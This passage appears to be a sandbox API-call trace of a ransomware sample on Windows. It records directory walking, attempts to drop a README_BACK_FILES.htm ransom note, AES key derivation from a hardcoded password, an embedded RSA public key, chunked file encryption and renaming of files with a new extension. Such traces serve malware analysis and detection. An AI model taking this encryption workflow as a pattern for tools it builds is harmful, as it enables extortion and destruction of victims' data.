out: hFindFile=0x28bf1d8) returned 1 [0239.811] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\production\\temp\\readme_back_files.htm")) returned 0xffffffff [0239.811] AreFileApisANSI () returned 1 [0239.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6950, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0239.811] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\production\\temp\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.812] GetLastError () returned 0x5 [0239.812] GetLastError () returned 0x5 [0239.812] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0239.812] FindClose (in: hFindFile=0x28bee18 | out: hFindFile=0x28bee18) returned 1 [0239.812] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\production\\readme_back_files.htm")) returned 0xffffffff [0239.812] AreFileApisANSI () returned 1 [0239.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f7030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0239.812] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\production\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.813] GetLastError () returned 0x5 [0239.813] GetLastError () returned 0x5 [0239.813] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0239.813] FindClose (in: hFindFile=0x28bf018 | out: hFindFile=0x28bf018) returned 1 [0239.813] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\IdentityCRL\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\readme_back_files.htm")) returned 0xffffffff [0239.813] AreFileApisANSI () returned 1 [0239.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd1d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0239.813] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\IdentityCRL\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.814] GetLastError () returned 0x5 [0239.814] GetLastError () returned 0x5 [0239.814] FindNextFileA (in: hFindFile=0x282df78, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0239.814] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\MapData\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28bf018 [0239.815] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.816] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0239.816] FindClose (in: hFindFile=0x28bf018 | out: hFindFile=0x28bf018) returned 1 [0239.816] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\MapData\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\mapdata\\readme_back_files.htm")) returned 0xffffffff [0239.816] AreFileApisANSI () returned 1 [0239.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd5c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0239.816] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\MapData\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\mapdata\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.817] GetLastError () returned 0x5 [0239.817] GetLastError () returned 0x5 [0239.817] FindNextFileA (in: hFindFile=0x282df78, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0239.817] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\MF\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28bf018 [0239.817] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.817] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.817] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0239.817] GetLastError () returned 0x5 [0239.817] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\MF\\Active.GRL" (normalized: "c:\\users\\all users\\microsoft\\mf\\active.grl")) returned 0x80 [0239.817] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\MF\\Active.GRL", dwFileAttributes=0x80) returned 1 [0239.818] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\MF\\Active.GRL" (normalized: "c:\\users\\all users\\microsoft\\mf\\active.grl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0239.818] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\MF\\Active.GRL.gsg" (normalized: "c:\\users\\all users\\microsoft\\mf\\active.grl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.819] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\MF\\Active.GRL.gsg", dwFileAttributes=0x2) returned 0 [0239.819] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28d4d60) returned 1 [0239.821] CryptCreateHash (in: hProv=0x28d4d60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0239.821] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0239.821] CryptHashData (hHash=0x28bee18, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.821] CryptDeriveKey (in: hProv=0x28d4d60, Algid=0x6610, hBaseData=0x28bee18, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28bf1d8) returned 1 [0239.821] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.821] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0239.822] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28d5998) returned 1 [0239.822] CryptImportPublicKeyInfo (in: hCryptProv=0x28d5998, dwCertEncodingType=0x1, pInfo=0x28ca368*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28ca398*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28ca3a0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28bec98) returned 1 [0239.822] CryptEncrypt (in: hKey=0x28bec98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0239.822] CryptEncrypt (in: hKey=0x28bec98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d6988*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28d6988*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0239.822] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d6988, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.822] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0239.822] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0239.823] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.823] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0239.823] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0239.823] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.823] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0239.823] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0239.823] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.823] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0239.823] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0239.823] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.823] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0239.823] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0239.823] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.823] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0239.824] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0239.824] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.824] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0239.824] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0239.824] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.824] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0239.824] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0239.824] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.824] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0239.824] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0239.824] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.824] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0239.824] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0239.824] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.824] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0239.824] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0239.824] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.824] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0239.824] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0239.824] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.824] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0239.825] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0239.825] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.825] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0239.825] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0239.825] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.825] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0239.825] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0239.825] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.825] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0239.825] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0239.825] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.825] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x27c, lpOverlapped=0x0) returned 1 [0239.825] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x27c, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x280) returned 1 [0239.825] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.825] CloseHandle (hObject=0x5d10) returned 1 [0239.825] CloseHandle (hObject=0xffffffff) returned 1 [0239.825] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\MF\\Active.GRL.gsg" (normalized: "c:\\users\\all users\\microsoft\\mf\\active.grl.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\MF\\Active.GRL" (normalized: "c:\\users\\all users\\microsoft\\mf\\active.grl"), bFailIfExists=0) returned 0 [0239.826] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\MF\\Active.GRL", dwFileAttributes=0x80) returned 1 [0239.826] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\MF\\Active.GRL.gsg" (normalized: "c:\\users\\all users\\microsoft\\mf\\active.grl.gsg")) returned 0 [0239.827] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\MF\\Active.GRL" (normalized: "c:\\users\\all users\\microsoft\\mf\\active.grl"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\MF\\Active.GRL.fuck" (normalized: "c:\\users\\all users\\microsoft\\mf\\active.grl.fuck")) returned 0 [0239.827] CryptDestroyHash (hHash=0x28bee18) returned 1 [0239.827] CryptDestroyKey (hKey=0x28bf1d8) returned 1 [0239.827] CryptReleaseContext (hProv=0x28d4d60, dwFlags=0x0) returned 1 [0239.827] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.827] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0239.827] GetLastError () returned 0x5 [0239.828] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\MF\\Pending.GRL" (normalized: "c:\\users\\all users\\microsoft\\mf\\pending.grl")) returned 0x80 [0239.828] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\MF\\Pending.GRL", dwFileAttributes=0x80) returned 1 [0239.828] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\MF\\Pending.GRL" (normalized: "c:\\users\\all users\\microsoft\\mf\\pending.grl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0239.829] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\MF\\Pending.GRL.gsg" (normalized: "c:\\users\\all users\\microsoft\\mf\\pending.grl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.829] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\MF\\Pending.GRL.gsg", dwFileAttributes=0x2) returned 0 [0239.829] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28d4d60) returned 1 [0239.832] CryptCreateHash (in: hProv=0x28d4d60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0239.832] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0239.832] CryptHashData (hHash=0x28bee18, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.832] CryptDeriveKey (in: hProv=0x28d4d60, Algid=0x6610, hBaseData=0x28bee18, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28bf218) returned 1 [0239.832] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, 